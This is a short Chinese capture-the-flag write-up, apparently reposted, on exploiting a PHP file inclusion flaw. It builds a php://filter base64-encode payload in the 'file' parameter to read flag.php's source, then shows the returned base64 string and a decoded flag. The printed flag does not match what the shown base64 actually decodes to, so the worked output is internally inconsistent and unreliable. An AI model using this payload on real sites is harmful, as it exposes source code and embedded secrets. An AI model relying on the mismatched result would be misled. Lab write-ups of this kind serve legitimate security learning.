文件包含漏洞-Include(讀取源碼)


文件包含漏洞-Include(讀取代碼)

1.靶場環境

然后點擊一下tips:

然后就是這些,但是url中有?file=flag.php 猜測文件包含漏洞,嘗試

文件包含直接讀取的是文件,而不是文件源碼,所以要想辦法讀取源碼

php://filter/read=convert.base64-encode/resource=xxx.php

這個方法可以讀取代碼

然后構造payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

2.然后得到對應字符串“XXXXXXX="以 = 結尾的字符串

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NWRiZmRhNTMtODUxYi00MzIwLTgxMzktMTIyYjBkOGEyNmQ0fQo=

不難看出這是base64加密的字符串,進行base64解密得到flag:

<?php
echo "Can you find out the flag?";
//flag{63e2b2c0-5f92-462e-adbf-e0588a34428c}


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM